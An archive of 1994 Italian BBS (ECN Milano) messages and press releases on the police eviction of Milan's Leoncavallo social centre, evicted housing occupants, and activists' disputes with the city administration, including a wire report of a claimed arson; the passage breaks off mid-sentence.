2825884 Msg#: 5746 Date: 30 Jul 94 20:04 From: Ecn Milano Read: Yes Replied: No To: All Mark: Subj: La polizia carica il presidio davanti al consiglio di zona 13 (MI) Quando il diritto alla casa diventa l'ennesimo attacco repressivo.... Milano, 29/7/94 Questa sera alle 20.30 un gran numero di agenti delle forze dell'ordine hanno caricato violentemente le famiglie che da 48 ore bloccavano parzialmente il Viale Ungheria chiedendo una soluzione da parte del Comune. Dopo essere state sgomberate dalle loro abitazioni, dopo i numerosi colloqui richiesti alle autorita' competenti, costretti a dormire da 50 giorni dentro il Consiglio di zona 13, dopo essere stati definiti da autorita' e giornali mafiosi, con tutti i termini atti a indicare un vero e proprio piano di attac- co verso persone che se si sono esposte fino a mettersi sulla strade perche' profondamente convinte di avere tutte le carte in regola per poter chiedere una casa per diritto. La violenza delle cosidette forze dell'ordine e' arrivata al punto di pestare con "armi alla mano" gli occupanti, arrestando 25 persone che stavano manife- stando contro il silenzio che la stampa di regime e il nuovo potere cittadino tanto coltivano sui problemi primari che affliggono questa citta' come la casa e il lavoro. Questa azione vergognosa apostrofata anche dagli abitanti del quartiere che gridavano vergogna nei confronti di chi operava tanto brutalita' nei confronti dei senza casa; e' la conseguenza tangibile e visibile di un sindaco total- mente incompetente per quanto riguarda i bisogni primari dei cittadini di Mi- lano, che pensa solamente ai suoi dissidenti interni, a non risolvere il pro- blema delle abitazioni in questa citta' coprendo ancora una volta il patrimo- nio socialista attraverso la assegnazioni dubbiose partitrocratiche e in odore di clientelismo. Va presa una posizione netta nei confronti di Formentini che non ha saputo risolvere politicamente il problema della casa ma ancora una volta col manga- nello della polizia. GLI SFRATTATI DI VIA RILKE, CHE PERNOTTANO DA DUE MESI NEL CONSIGLIO DI ZONA 13 CONTINUANO LA LORO OCCUPAZIONE E CHIEDONO LA SOLIDARIETA' DI TUTTE LE PERSONE COSCIENTI ED INTELLIGENTI, SINCERAMENTE DEMOCRATICHE AFFINCHE' SI COSTRINGA IL SINDACO DI MILANO A FARE IL SINDACO DI TUTTI I CITTADINI E NON DI CHI ESERCITA I POTERI FORTI IN QUESTA CITTA'. Milano, 29 luglio '94 Msg#: 6068 Date: 09 Aug 94 14:17 From: ECN Milano Read: Yes Replied: No To: all Mark: Subj: sgomberato il Leoncavallo questa mattina alle ore 10.00, trecento tra poliziotti e carabinieri hanno sgomberato il Centro sociale Leoncavallo. All'interno si trovavano 5 compagni, che sono stati solo identificati. Poi il materiale del centro sociale e' stato portato in un deposito comunale. il questore Serra ha dichiarato di non vedere nessun problema sociale ne sedi alternative. E' stato solo eseguito uno sfratto. Gli occupanti verranno denunciati per violazione di una ordinanza dell'autorita, quella che imponeva il rilascio dell'immobili. Alle ore 14 la polizia circonda ancora il centro sociale e si sta tentando un presidio al parco Alessandrini, vicino all'ortomercato. Il boia sindaco Formentini ha dichiarato la sua soddisfazione, definendo definitivamente morto il centro sociale. Msg#: 6070 Date: 09 Aug 94 15:45 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: sgomberato centro sociale leoncavallo milano, 9 agosto 1994 comunicato stampa alle 10.00 di questa mattina, in una milano ormai deserta, dopo aver completamente militarizzato la zona est della citta', un ingente numero di ps e cc ha sfondato le porte del Centro Sociale Leoncavallo e sta ora procedendo allo sgombero. Questo e' un atto gravissimo, che evidenzia ulteriormente la precisa volonta' del sindaco formentini e della sua giunta di cancellare definitivamente dal territorio tutte quelle realta' sociali e politiche che, da decenni portano avanti lotte per il diritto alla casa, al reddito, a spazi a uso sociale e collettivo. Questo attacco all'opposizione sociale si sta strutturando a piu' livelli, dalle oltre 850 denunce emesse a carico dei compagni di milano nell'ultimo anno e mezzo, agli sgomberi di case occupate e centri sociali, ai processi. Questi straordinari laboratori di lotte sociali e politiche, di sperimentazio- ne culturale, di aggregazione slegata dalle logiche del profitto, sono l'anima democratica, antifascista e viva di territori ormai consegnati nelle mani del- la speculazione edilizia, dell'eroina e dei poteri forti di questa citta'. E' fondamentale ribadire a chi ci vorrebbe assenti dai territori, che espe- rienze come quella del Centro Sociale Leoncavallo, delle case occupate e degli altri centri sociali, non possono venire cancellate dalla storia presente e futura della citta'. Lanciamo quindi un appello a tutte le realta' sociali e politiche, ai compa- gni, ai frequentatori dei centri sociali, affinche' sia evidente a tutti che queste realta', che negli anni sono state patrimonio di migliaia di persone e intelligenze che le hanno attraversate e arricchite, hano pieno titolo e piena legittimita' ad esistere e non si lasceranno cancellare dai territori nei qua- li vivono e agiscono da decine di anni. Abbiamo indetto una conferenza stampa per oggi alle ore 14 in via salomone 71. Indiciamo fin da ora una mobilitazione collettiva !!! Per informazioni: CENTRO SOCIALE LEONCAVALLO tel. 02 26140287 - 0337 328455 fax 02 26820360 nessuna giustizia nessuna pace Msg#: 6141 Date: 10 Aug 94 10:52 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: ruspe a villa amantea questa mattina alle 8,30 la polizia municipale e' intervenuta con le ruspe a villa amantea, dove ha abbattuto le strutture del tendone di "su la testa" adiacente al Centro Sociale Spazzali che vi svolgeva le proprie iniziative Msg#: 6145 Date: 10 Aug 94 16:22 From: Lrkwz Read: Yes Replied: No To: ECN Milano Mark: Subj: Re: sgombero leoncavallo ECN Milano il 08-09-94 15:56 scrisse a proposito di 'sgombero leoncavallo' :-) EM> NESSUNA GIUSTIZIA NESSUNA PACE Si puo' telefonare in tanti al 6236 chiedendo della segreteria del sindaco (boiardo) per esprimeere la propria protesta. N.ri alternativi: sindaco-capo segreteria s. 86463515 vice sindaco 865244/877846 purtroppo non mollano il n.ro del fax, si possono solo scrivere lettere. Msg#: 6378 Date: 13 Aug 94 15:18 From: snd Read: Yes Replied: No To: All Mark: Subj: milano 12 agosto - la chiusura di spazi continua ieri mattina, venerdi' 12 agosto, alle 10,30 le forze dell'ordine hanno nuovamente circondato parco alessandrini x imporre che venissero staccati tutti gli striscioni del leo che erano stati appesi lungo la rete di recinzione del parco, motivazione: propaganda abusiva !!! ridicolo ? abbastanza, se non fosse che CONTEMPORANEAMENTE un nutrito manipolo della polizia municipale provvedeva a sgomberare dai locali del consiglio di zona 13 ( in v.le ungheria - a uno sputa da via salomone ) le 8 famiglie di sfrattati di via rilke che da 2 mesi li stavano occupando ora il consiglio di zona e' saldamente presidiato dalla polizia municipale. attorno alle 21 ps e cc si sono di nuovo schierati davanti al parco alessandrini per "chiedere" che un furgone, momentaneamente parcheggiato su un prato, venisse spostato :-((( scusate, mi scappa da kagare; adesso telefono un attimo in questura x sapere se posso andare al cesso o se me la devo fare nei pantaloni ... - a presto - Msg#: 6559 Date: 18 Aug 94 22:41 From: snd Read: Yes Replied: No To: All Mark: Subj: leo voila' !!! l'iniziativa di tre giorni di concerti e - forse - altre cose di cui era gia' stata negata l'autorizzazione x parco Alessandrini, non e' stata autorizzata nemmeno nello spiazzo davanti al Centro Sociale Spazzali. Ieri il Questore ha comunicato ad alcuni rappresentanti del Leoncavallo che l'autorizzazione chiesta da 2 consiglieri di RC all'assessorato comunale competente, era stata negata 1. i consiglieri d'opposizione di Rifondazione Comunista 2. chiedono al Comune un'autorizzazione 3. il Questore 4. convoca i rappresentanti del Leo * per dire loro che l'autorizzazione di cui sopra non e' concessa oggi, pikkolo experimendo : * alcuni compagni vanno con un furgone allo Spazzali ( "presidiato" a breve distanza da polizia municipale e forze dell'ordine ) e * appena scaricati 2 pezzi di palco arriva l'esercito "ne' qui ne' la', 'a festa non si fa in tuuutta la citta'" :-) insomma: la digos affermava che dal Comune di Milano e' stata emessa un'ordinanza che interdice qualsiasi spazio, pubblico o privato, in tutta la citta', a qualsiasi genere di manifestazione pubblica che non sia autorizzata, e che quindi loro dovevano intervenire non e' stato possibile prendere visione di detta "ordinanza" subito dopo i vigili urbani hanno accompagnato alcuni tecnici del comune ad ispezionare la costruzione del centro sociale per "verificarne la stabilita'". verifica che ha dato esito positivo, i locali hanno tutti i requisiti di stabilita' necessari per essere abitabili, ma non quelli necessari per ospitare manifestazioni pubbliche. poco piu' tardi u assessore comunale ha dichiarato alla stampa che in ogni caso nell'area antistante il centro sociale spazzali, l'azienda energetica municipale aveva gia' messo in previsione di iniziare DA DOMANI 19 AGOSTO dei lavori di scavo quindi allo stato attuale dell'arte * I CONCERTI NON CI SARANNO * DOMANI CERCHEREMO COMUNQUE DI "PRENDERCI" LA PIAZZA ANTISTANTE LO SPAZZALI PER FARCI 3 GIORNI DI ASSEMBLEE E DIBATTITI O NON SO CHE' - a presto - Msg#: 6646 Date: 21 Aug 94 01:07 From: snd Read: Yes Replied: No To: All Mark: Subj: leo/spazzali TORDELLI CERCA LO SGOMBERO DELLO SPAZZALI La giornata di dibattiti prevista dal programma della 3 giorni antirazzista convocata dal leo presso il centro sociale spazzali, e' stata caratterizzata da un'imponente dispiegamento forze dell' ordine fatte intervenire dall'assessore leghista Tordelli - sindaco pro tempore durante le vacanze di Formentini ( che anche in sardegna e' stato colpito dall'ormai consueto volantino "in questa citta' circola un uomo pericoloso ..." grazie allo spirito di iniziativa di un gruppo di ragazzi del posto :-). Verso le 19, mentre era in corso l'assemblea dei centri sociali e delle realta' autogestite milanesi, giungeva notizia di un'operazione di ammassamento di mezzi di ps e cc all'ingresso del quartiere. Poco dopo l'intera zona di baggio nel raggio di oltre un chilometro dal centro sociale e' stata chiusa dai vigili urbani, e i mezzi della polizia hanno cominciavato a disporsi lungo le strade che portano al centro sociale. Da alcuni giornalisti che intanto cominciavano ad arrivare si veniva a sapere che il sindaco pro tempore, Tordelli, e il presidente del consiglio comunale, la leghista Gazzola, stavano per arrivare a Baggio, e che lo schieramento di truppa era dovuto alla loro imminente presenza. Spiegazione del tutto incongruente con le dimensioni che stava assumendo il dispiegamento di forze davanti ai nostri occhi. Attorno alle 19,30 i mezzi blindati e truppa a terra iniziavano a circondare l'area ( piuttosto vasta ) in cui si trova il centro sociale. I compagni presenti - oltre un centinaio - hanno immediatamente barricato i lati da cui era possibile l'accesso. Alcuni compagni si recavano dalla Digos per avere spiegazioni, e contemporaneamente sopraggiungeva il consigliere di RC "atomo" Tinelli, da cui si veniva a sapere che il sindaco, dopo aver saputo che ieri sera l'iniziativa si e' svolta regolarmente, e per di piu' con tanto di CONCERTO e grande afflusso di gente ( quando la festa della lega riusciva a malapena a raccogliere un 50/100 persone a sera ), aveva imposto alla polizia l'intervento al fine di operare uno sgombero immediato ( l'area del centro sociale e' di proprieta' comunale ). Poco dopo giungeva anche il suddetto Tordelli con la Gazzola. In un primo momento hanno cercato con nonchalance di avviarsi verso l'ingresso del centro sociale, ma hanno poi desistito, scoraggiati dall'espressione trucissima dei non pochi compagni che sono andati loro incontro. Intanto la notizia si diffondeva in citta' e cominciava ad arrivare gente, che a piedi riusciva a raggiungere il centro sociale. Il flusso di persone, anche quelle richiamate dall'iniziativa, e' continuato per tutta la sera, raggiungendo presto le dimensioni di ieri, nonostante si dovesse lasciare la macchina molto distante e attraversare diversi blocchi di schieramenti di forze dell' ordine. Si e' deciso di restare tutta la notte ( facendo anche dei turni per dormire ) e di riprendere domani l'iniziativa, con la discussione per prepare la convocazione del corteo nazionale del 10 settembre. Il concerto non si e' potuto svolgere e il centro sociale Spazzali sara' probabilmente ( anzi sicuramente, secondo le valutazioni dei presenti e voci di fonti diverse ) sgomberato nei primi giorni ( lunedi' o martedi' ) della settimana entrante. - a presto - Msg#: 6762 Date: 23 Aug 94 14:08 From: snd Read: Yes Replied: No To: All Mark: Subj: leo strutture e compagni del leoncavallo sono, ancora per qualche giorno, ospiti del centro sociale spazzali, in via amantea, quartiere baggio (mm bandenere + bus 67 ) questa mattina l'azienda elettrica municipale ha staccato acqua ed elettricita' al centro sociale spazzali, e sono inoltre iniziati i lavori delle ruspe x costruire, nell'area un tempo occupata dal tendone di "su la testa", un parcheggio ed una strada ... Msg#: 6763 Date: 24 Aug 94 00:49 From: snd Read: Yes Replied: No To: All Mark: Subj: spazzali acqua e corrente, staccati stamattina come promesso dal sindaco estivo nei giorni scorsi, questo pomeriggio sono stati riattacati lo spazzali e' intestatario di regolari contratti ed ha altrettanto regolarmente pagato le bollette si pensa che che la sospensione delle forniture sia stata dovuta ai lavori di scavo iniziati oggi nello spiazzo dietro al centro sociale, per costruire una strada ed un parcheggio l'azienda energetica municipale non ha fornito spiegazioni ne' aveva dato formale comunicazione della sospensione, sia pure temporanea, dei servizi Msg#: 6146 Date: 10 Aug 94 16:09 From: snd Read: Yes Replied: No To: All Mark: Subj: sgombero point ecn-leoncavallo ola' una piccola curiosita' "a latere" dello sgombero del leo: i digotti, nello sgombero del Leoncavallo dai locali della Krupp, si sono portati anche due "experti informatici", che hanno provveduto sul posto ad eseguire un accurato backup dell'HD del PC su cui c'era il point ecn del leo ( 45:1917/1.71 ) e tutto il materiale dei vari collettivi, gruppi, singoli, "amministrazione", ecc. piu' tardi nella giornata ci e' stato possibile portare via il PC ! Origin: European Counter Network - Milano (45:1917/1) SEEN-BY: 1/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 1200/1 2 5 6 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 Msg#: 6205 Date: 11 Aug 94 20:44 From: Gomma Read: Yes Replied: No To: snd Mark: Subj: sgombero point ecn-leoncavallo Ciao snd: > due "experti informatici", che hanno provveduto sul posto > ad eseguire un accurato backup dell'HD del PC > su cui c'era il point ecn del leo ( 45:1917/1.71 ) > e tutto il materiale dei vari collettivi, gruppi, > singoli, "amministrazione", ecc. Non riesco a capire a quale titolo e con quale diritto. Sui giornali il que- store Serra ha affermato che niente era stato posto sotto sequestro. Com'e' possibile dunque, se un PC non e' posto sotto sequestro, o non sia indagato per qualche ragione il proprietario del PC, che i dati vengano copiati e trattenuti? Mi sembra una palese violazione del diritto alla privacy. Dentro la macchina vi potevano essere corrispodenze private, ad esempio, o file riguardanti la sfera privata di qualcuno. E' stata data qualche giustificazione o vi siete accorti dell'accaduto solo successivamente? From: ECN Milano Read: Yes Replied: No Subj: comunicato c.s. leoncavallo Comunicato Stampa Nella mattina di oggi, mercoledi' 24 agosto 1994 il Centro sociale Leoncavallo ha presentato alla Questura di Milano un preavviso per lo svolgimento di una manifestazione pubblica. L'iniziativa, un presidio permanente dal giorno 27 agosto al giorno 4 settembre, si terra' in via Bertelli, a fianco dell'anfiteatro del Parco della Martesana, da anni in stato di totale e colpevole abbandono. Dopo la farsa intrapresa dal sindaco d'agosto Tordelli allo scopo di debellare l'illegalita' nella citta' di Milano e gli avversari politici dell'amministrazione, nel corso dei tre giorni di iniziativa tenutasi presso il centro sociale Spazzali di Baggio, ragione vorrebbe che venisse risparmiata alla citta' una penosa e rischiosa replica. A tale scopo non sono previsti atti o attivita' soggette a iter autorizzativi del Comune di Milano: ogni ulteriore divieto allo svolgimento delle iniziative del Centro Sociale leoncavallo ricade pertanto esclusivamente nella violazione, sistematica in questa citta', delle liberta' di organizzazione ed espressione politica. Leggiamo inoltre con stupore dalla stampa quotidiana le vicende relative al miliardo di danni che sarebbe stato arrecato alla palazzina di via Salomone 71 di proprieta' della ditta Krupp; a tale proposito abbiamo sempre rilevato come non possano considerarsi danni, bensi' migliorie, alcune, tra l'altro, di indiscutibile pregio, le trasformazioni apportate al fine di trasformare l'uso di detto immobile al fine di renderlo atto ad accogliere attivita' di tipo sociale e comunitario. Tutt'altra cosa sono i danni arrecati allo stabile dalla polizia che, senza scrupolo alcuno, hanno demolito muri e divelto porte nell'esecuzione della "difficile" operazione sgombero del 9 agosto. Rileviamo inoltre che la spesa sostenuta dallo stato al fine di consentire sulla vicenda del Leoncavallo la speculazione di molteplici parti politiche, avrebbe consentito l'allocazione di decine di realta' associative e l'esplicazione di innumerevoli servizi. Avvicinandosi la ripresa dell'attivita' produttiva e politica nella citta', nella quale comprendiamo anche la manifestazione nazionale del 10 settembre e tre giorni di iniziativa politico culturali ad essa connessi ( il 9/10/11 settembre ) riteniamo debbano cessare le provocazioni operate dalla giunta di Milano contro le realta' sociali oggetto in questa estate di insensato attacco. Milano, 23 agosto 1994 Centro Sociale Leoncavallo -!- ! Origin: European Counter Network - Milano (45:1917/1) SEEN-BY: 1/1 5/1 9/1 30/1 1000/1 4 1100/1 1200/1 5 7 1400/1 1500/3 1600/1 SEEN-BY: 1800/1 1900/1 1917/1 2 3 11 2000/1 Msg#: 6887 Date: 25 Aug 94 18:14 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: com. stampa Comune di Milano Comune di Milano Ufficio Stampa 25 agosto 1994 E' pervenuta all'Amministrazione comunale una richiesta di occupazione di suo- lo pubblico, da parte dei signori D.F. e M.M., per un presidio in via Bertelli (parco Martesana), dalle ore 14 di sabato 27 agosto alle 23.00 di domenica 4 settembre. L'Amministrazione comunale ha ritenuto di non accogliere la richiesta, non essendo possibile concedere il Parco della Martesana, sia perche' non usuale che simili manifestazioni si svolgano all'interno di parchi, sia perche' ne potrebbe derivare un dano al tappeto erboso. In alternativa, l'Amministrazione ha concesso ai signori D.F. e M.M., sotto la loro responsabilita', l'occupazione di suolo pubblico in piazza Lima, dalle ore 7.30 alle ore 19.30, nei giorni 27 e 28 agosto (per due giorni quindi, co- me di consuetudine con altri Enti e associazioni) per effettuare la raccolta firme. La concessione e' subordinata al rispetto dei regolamenti vigenti ed e' revocabile in qualsiasi momento. Le decisioni dell'Amministrazione sono state comunicate ai signori D. e M. nel pomeriggio di oggi. Msg#: 6888 Date: 25 Aug 94 18:23 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: Com Stampa C.S. Leoncavallo Centro Sociale LEONCAVALLO COMUNICATO STAMPA IL RIDICOLO E L'ARBITRIO Milano, 25 agosto 1994 Nella giornata di oggi il Comando dei Vigili Urbani ha dato risposta alla richiesta di autorizzazione per "occupazione di suolo pubblico", avanzata "secondo i termini di legge" dal Centro Sociale Leoncavallo, con un banchetto per la raccolta di firme che avrebbe dovuto tenersi da sabato 27 agosto a domenica 4 settembre in via Bertelli presso il Parco della Martesana, nel cor- so di un presidio permanente. Si tratta di un normale atto amministrativo, quotidianamente assolto dai comandi di zona dei Vigili Urbani, in caso di petizioni popolari e raccolte di firme da parte di associazioni e anche di normali cittadini. I Vigili Urbani hanno comunicato che l'Assessorato al Traffico, Trasporti e Viabilita' aveva INVECE autorizzato un banchetto in piazza Lima, dalle 7,30 alle 19,30, per i soli giorni 27 e 28 agosto, adducendo quale giustificazione di questo arbitrio che "PER CONSUETUDINE a Milano le raccolte di firme si fan- no in piazza Lima" !!! Ricordiamo che la richiesta di via Bertelli e' motivata dalla precisa volonta' - piu' volte espressa in questi mesi dai centri sociali autogestiti - di esse- re presenti in quelle allre della citta' dove piu' palesi sono il degrado e l'abbandono da parte dell'amministrazione pubblica. Nel Parco della Martesana e' sito un anfiteatro da 700 posti e una struttura coperta di 500 mq costruita 2 anni fa da un'impresa edile a compensazione di oneri di urbanizzazione, e destinata ad usi sociali, MAI PRESA IN CONSEGNA DAL COMUNE. La motivazione addotta da Palazzo Marino e' un palese pretesto per esercitare l'ennesimo arbitrio nei confronti dei centri sociali autogestiti, poiche' l'u- so della stessa area e' gia' stato autorizzato in passato per iniziative simi- li, ultima delle quali quella tenuta agli inizi di giugno dal Partito Umani- sta. Msg#: 6925 Date: 26 Aug 94 16:21 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: leo alla martesana Milano, 26 agosto 1994 COMUNICATO STAMPA Mentre qualche giornale straparla di agguati a base di pane secco, uova e porfido (?) ben piu' serio attentato il Comune di Milano va preparando ai danni della liberta' di espressione ed associazione politica. Domani alle ore 14,30 il Centro Sociale Leoncavallo si rechera' in via Bertelli per iniziare il presidio permanente preannunciato nei termini di legge all'autorita' di Pubblica Sicurezza. A tale proposito informiamo che nessun divieto e' stato posto a tale iniziativa non essendo tra i compiti istituzionali di qualsivoglia ufficio comunale regolare le liberta' politiche nella citta' di Milano. In mancanza di ulteriori accadimenti il divieto imposto dalla vigilanza urbana riguarda soltanto la presenza di un banchetto atto alla raccolta di firme. Nel corso dell'iniziativa verra' denunciato lo stato si colpevole abbandono in cui versa l'anfiteatro sito ai margini del Parco della Martesana come del resto svariati altri immobili di proprieta' comunale. A tale scopo verra' organizzata la raccolta degli innumerevoli stratificati reperti (siringhe...) di cui e' dotata da anni la struttura e la loro consegna all'autorita' comunale. Ringraziamo sentitamente la vigilanza urbana per l'autorizzazione concessa per i giorni 27/28 agosto in piazza Lima e valutando se accettarla, ricordiamo pero' che nessuna l'ha mai chiesta. Contiamo sulla presenza del Sindaco Formentini per constatare, come gia' il suo sostituto Tordelli, che non vengano tenuti pericolosi concerti nel corso dell'iniziativa e informiamo fin da subito la vigilanza urbana, l'autorita' di Pubblica Sicurezza, la Protezione Civile... che la prevista proiezione serale verra' regolarmente effettuata con due grossi autonomi che reggeranno lo schermo e due piu' piccoli con in mano il proiettore; l'eventuale autorizzazione per l'occupazione di suolo pubblico non avra' pertanto superficie superiore a otto piedi. Centro Sociale Leoncavallo Msg#: 6926 Date: 26 Aug 94 16:47 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: leonka vive, milano brucia ANSA - MILANO 26 AGOSTO Un incendio ha distrutto la scorsa notte tre prefabbricati adibiti a uffici e spogliatoi per operai nel cantiere edile che sorge in via Leoncavallo a Milano nell'area della vecchia sede dell'omonimo centro sociale. Stamane alla redazione milanese dell'ANSA e' giunta una telefonata di rivendicazione: "questa e' una rivendicazione, non e' uno scherzo - ha detto una voce maschile - questa notte abbiamo colpito il cantiere di via Leoncavallo. Contro il divieto a manifestare. Sul Leoncavallo non costruirete niente. Azione Diretta". Secondo i primi accertamenti condotti dalla polizia sul luogo non sono stati trovati segni di liquido infiammabile, ma non viene esclusa la matrice dolosa dell'incendio. Un cancello in ferro all'angolo fra via Mancinelli e via Leoncavallo, dal quale si accede al cantiere e' stato trovato aperto. Le fiamme si sono sviluppate verso le 3 e l'intervento dei vigili del fuoco e' durato circa un'ora e mezza. L'impresa Morganti di Milano che coordina i lavori per la costruzione di un condominio sull'area che per circa vent'anni ha ospitato la sede storica del centro Leoncavallo non ha ancora fatto un bilancio dei danni, che ammonterebbero comunque a qualche decina di milioni di lire. Intanto non e' stata presentata alcuna denuncia nei confronti dei giovani del centro leoncavallo, sorpresi ieri nei pressi dell'aeroporto di Linate proprio mentre arrivava in aereo da Olbia il sindaco di Milano Marco Formentini. Secondo la Digos e i vigili urbani, il gruppo stava forse preparando una protesta contro il sindaco. Dietro un cespuglio sono stati trovati cubetti di porfido, uova, pezzi di pane secco e una tanica contenente detewrsivo. Poco distante, appeso ad un sottopasso in viale Forlanini, la strada che dall'aeroporto porta verso il centro citta', c'era uno striscione con la scritta "LEONKA VIVE, MILANO BRUCIA". Oggi il centro sociale ha comunicato che domani si rechera' in via Bertelli all'interno del parco della Martesana per denunciare lo stato di abbandono in cui versa l'anfiteatro e altri immobili comunali. Ieri l'amministrazione comunale aveva reso noto di non aver concesso l'autorizzazione al presidio in via Bertelli dando il via libera invece per una raccolta di firme in piazza Lima. "Ringraziamo per l'autorizzazione concessa in piazza Lima - hanno scritto i leoncavallini in un comunicato diffuso oggi - e valutando se accettarla ricordiamo pero' che nesuna l'aveva mai chiesta". Msg#: 6927 Date: 26 Aug 94 16:48 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: da domani alla martesana quindi da domani saremo al parco della martesana, in via bertelli, mm gorla - bus 56 se non ci sara' consentito saremo altrove :-) Msg#: 6928 Date: 27 Aug 94 01:04 From: snd Read: Yes Replied: No To: All Mark: Subj: leo i vigili urbani hanno piazzato fin da questo pomeriggio una macchina proprio davanti all'anfiteatro di parco martesana ( paura, eh ?!? ) l'appuntamento e' comunque confermato :-) Msg#: 7008 Date: 27 Aug 94 16:49 From: snd Read: Yes Replied: No To: All Mark: Subj: sgomberato c.s. barricate a parma SGOMBERATO IL CSOA BARRICATE (Parma) Martedi' 23 Agosto, Digos, polizia e vigili urbani, per ordine del sindaco Lavagetto (PDS) hanno sgomberato il centro sociale autogestito "barricate" dopo che l'occupazione si era protratta per piu' di 9 mesi per la quarta volta in meno di due anni i poteri forti della citta' (massoneria, unione industriali, partiti, polizia) usano la violenza per colpire il bisogno di spazi di autogestione e di organizzazione delle lotte proletarie contro la vita alienata che il sistema del dominio impone ogni giorno sul lavoro, nella scuola, nel tempo libero. Il massone Lavagetto e i suoi servi non si illudano di risolvere in questo modo la questione degli spazi sociali. La contraddizione e' forte e si ripropone ogni giorno: ieri un altro morto di eroina ci ha fatto comprendere ancora una volta come anche Parma non abbia un'alternativa sociale e culturale alla disperazione ed alla solitudine. Il nostro centro sociale e' stato un tentativo di dare un'alternativa umana e socialmente positiva a un grande spazio inutilizzato e destinato allo sfacelo o alla speculazione. Il nostro sindaco e il suo partito - PDS - legati a doppio filo all'unione industriali e ai poteri occulti della citta' legittimano con la loro partecipazione attiva le manovre piu' sporche di speculazione edilizia sulle "aree dismesse" (vedi ruolo della SINCO, cooperativa vicino al PDS e gli arresti di alcuni dei dirigenti del partito in relazione allo scandalo dell'ex Robuschi). Il "nostro" sindaco e' poi stranamente il notaio che sancisce l'operazione di acquisto dell area ex Robuschi da parte del consorzio di imprenditori "La corte". La differenza del'"progressista" Lavagetto ed il leghista Formentini che ha sgomberato il csoa Leoncavallo sono inesistenti: in realta' Lavagetto e' come Formentini. Promettiamo al sindaco e al PDS che lui ed "i suoi amici" pagheranno tutte le conseguenze politiche di questo sgombero. Nessuna giustizia nessuna pace collettivo spazi sociali CSOA BARRICATE - PARMA Msg#: 7009 Date: 27 Aug 94 16:56 From: snd Read: Yes Replied: No To: All Mark: Subj: leoncavallo alla martesana questo pomeriggio alle 14,30 (come da programma) la comunita' nomade del leoncavallo si e' felicemente insediata presso l'anfiteatro del parco della martesana, in via bertelli (venendo da via padova si gira in via agordat e poi sempre dritto - sono 200 m ) poiche' il comune di milano ha proibito la raccolta di firme prevista, questa la faremo un'altra volta :-))) il posto e' incantevole, accorrete numerosi !!! Msg#: 7057 Date: 28 Aug 94 02:33 From: snd Read: Yes Replied: No To: All Mark: Subj: comunicato c.s. leoncavallo FORMENTINI COME BRAMIERI Che Formentini fosse "il sindaco di tutti i milanesi" lo scrivono da tempo i quotidiani ma che fosse anche il comico (e che comico!) di tutti i milanesi questo dovevamo ancora scoprirlo. Come dobbiano altrimenti interpretare le dichiarazioni pubbliche apparse oggi sui quotidiani se non come barzellette della miglior tradizione? Ecco cosi' che un contenitore di detersivo (perche' anche i leoncavallini si lavano??!!!) diventa subito "diserbante (che e' infiammabile)", quattro volantini appesi allegramente per le strade di Courmayeur diventano una "spedizione squadristica". E le uova: anche se comprate in giornata quelle degli autonomi sono sempre "marce"! Che la signora Augusta poi non si senta tranquilla "nemmeno quando va dal parrucchiere", beh e' un problema tutto suo. Noi non possiamo fare altro che consigliarle di cambiare parrucchiere. Per quanto riguarda poi il "disprezzo della gente" crediamo invece che sempre maggiore sia l'insofferenza verso l'inettitudine dell'amministrazione leghista, e basterebbe al "sciur sindich" e signora girare la citta' in tram invece che scortati sulle loro auto di rappresentanza. Ci sarebbe solo da ridere, se non fosse che affermazioni cosi' deliranti (purtroppo non dettate solo dal sole d'agosto) servoo a coprire l'inefficienza di un sindaco e di una giunta che nulla hanno fatto per il recupero di intere strutture e aree verdi di proprieta' del comune sotratte ad un uso sociale e abbandonate al piu' completo degrado, in attesa forse di tempi piu' propizi alla speculazione! Che mentre chiude i centri sociali autogestiti e interamente autofinanziati discute la "privatizzazione" di quelle poche strutture territoriali esistenti (vedi centri giovani, centri territoriali, ecc.) affidandole con cospicui finanziamenti alla Compagnia delle Opere. Altro che occuparsi di giovani: un vero e proprio scambio politico con interi settori del PPI (leggi ex dc). Che spende miliardi per finanziare iniziative culturali d'elite e impedisce lo svolgersi di manifestaazioni popolari a bassi costo orgaizzate da "liberi cittadini". Che usa la macchina amministrativa e burocratica come una schiaccia sassi per azerare qualunque foerrma di dissenso politico e sociale presente sul territorio. Che ... Centro Sociale Leoncavallo Msg#: 7134 Date: 30 Aug 94 01:32 From: ECN MILANO Read: Yes Replied: No To: Tutti Mark: Subj: x una manifestazione a milano il 10 settembre PER UNA MANIFESTAZIONE NAZIONALE A MILANO IL 10 SETTEMBRE A conclusione di tre giorni di iniziativa politica e di dibattito tenutisi presso il C.s. Sergio Spazzali Hachmi di Baggio il 19-20-21 agosto, le realta' presenti hanno definito il seguente comunicato, rivolto principalmente a quanti, in tutto il paese hanno seguito le vicende dell'agosto milanese e a quanti nei prossimi mesi saranno chiamati per propria, personale o collettiva , situazione, a rispondere alla negazione di diritti fondamentali sul piano delle condizioni materiali e delle liberta' politiche e di espressione culturale. Con lo sgombero del C.s. Leoncavallo e il parziale smantellamento del C.s. Spazzali si sono chiariti ulteriori elementi del programma con il quale la destra politica e sociale intende governare il paese. A cominciare da quelle zone dove le elezioni amministrative prima e le politiche dopo hanno consegnato un identico segno politico tra potere centrale e locale. Abbiamo ribadito , ancora nel trascorso mese di luglio, che un attacco all'esperienza dei centri sociali milanesi avrebbe avuto il significato di una rottura profonda con un intero tessuto sociale; in una situazione in cui alle movenze generali, tutte a danno dei soggetti subalterni, sui temi della casa, del reddito, dell'istruzione, della generale privatizzazione dei servizi... si e' velocemente assommata la gestione della citta' operata dalla Lega Nord che ha visto la progressiva compressione delle opportunita' di espressione politica e culturale. Le trasformazioni produttive degli ultimi decenni hanno evidenziato nuovi soggetti sociali portatori di forme proprie di organizzazione politica e della rappresentanza autorganizzata nei luoghi del lavoro. L'attacco ai centri sociali, l'esclusione sistematica delle associazioni e delle realta' di base da parte della macchina burocratica dell'amministrazione comunale piegata ai fini della battaglia politica, il divieto reiterato imposto da mesi all'iniziativa politica, fosse essa corteo, presidio, festa, hanno pertanto una gravita' particolare. La 